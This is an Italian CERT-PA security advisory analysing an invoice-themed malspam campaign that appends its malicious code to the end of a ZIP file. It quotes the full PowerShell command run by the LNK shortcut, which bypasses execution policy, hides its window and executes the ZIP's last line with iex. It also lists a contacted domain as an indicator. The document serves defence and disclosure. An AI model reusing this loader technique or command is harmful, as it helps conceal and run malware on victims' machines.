Campagna malspam con Payload occultato nel file ZIP

08/11/2018

lnk malspam malware steganografia


Le campagne di malspam che hanno come oggetto l’inoltro di “Fatture” sono sempre attuali. Dalle ultime evidenze emerse dalle analisi del CERT-PA lo scenario risulta essere sempre lo stesso: si cerca di indurre il destinatario a cliccare su un link presente nel corpo del messaggio o sull’allegato per aprire la presunta fattura.

A differenza delle precedenti campagne, quella analizzata nella giornata di ieri, che fa riferimento ad una presunta fattura emessa nel mese di luglio, presenta una particolarità nel file ZIP che viene restituito cliccando sul link “Fattura NA-14246CIW disponibile“. L’archivio compresso contiene al suo interno due file: una immagine PNG e un collegamento LNK, ma questa volta il codice malevolo che si occupa di scaricare il malware non è contenuto nel file LNK ne è stato occultato all’interno dell’immagine come abbiamo già evidenziato nelle analisi precedenti.

La tecnica osservata in questa ultima ondata di malspam consiste nel nascondere il codice malevolo in coda al file ZIP

Cliccando sul file LNK viene eseguito il codice PowerShell di seguito riportato:

C:\Windows\System32\cmd.exe /C powershell.exe -eP ByPass -win hi"dd"en -c 
"&{$l=get-childItem -path c:\users\* -recurse -force -include documento-aggiornato-*.zip;
$n=get-content -LiteralPat $l.fullname;$n[$n.length-1]|iex}"

Nello specifico, a partire dalla cartella c:\users\, lo script ricerca con metodo ricorsivo la posizione del file ZIP appena scaricato (documento-aggiornato-*.zip) e successivamente ne legge il contenuto soffermandosi sull’ultima riga. Di seguito l’estrazione del contenuto replicando manualmente lo script PowerShell:

Analizzando il file documento-aggiornato-CQ-0054542NO.zip con un editore esadecimale è possibile osservare in chiaro la porzione di codice malevolo riportato in coda al file ZIP:

Questa tecnica, al pari degli artifici per occultare il codice, già osservati nelle campagne precedenti, consente ai criminali di superare i controlli di sicurezza perimetrali e quindi di mantenere attiva la campagna più a lungo possibile.

Non è stato possibile scaricare il sample poichè il dominio contattato non è al momento raggiungibile ma da analisi osint è stato possibile recuperare gli IoC per i file in download dal dominio interessato nell’arco dell’ultima settimana.

Generiche contromisure

Una soluzione sempre valida contro questa modalità di diffusione, che non è legata alle firme Antivirus, è quella di bloccare il traffico in uscita dai client per quei comandi come “cmd”, “cscript” o “powershell” che di solito sono attivati per il download di codice malevolo da internet.

Ulteriori suggerimenti, da valutare lato end-point, richiamano l’attuazione di specifiche politiche di controllo e restrizioni sulle funzionalità di Windows tra cui:

Indicatori di compromissione

Il dominio contattato è il seguente: https://artisbond.org/arti/bond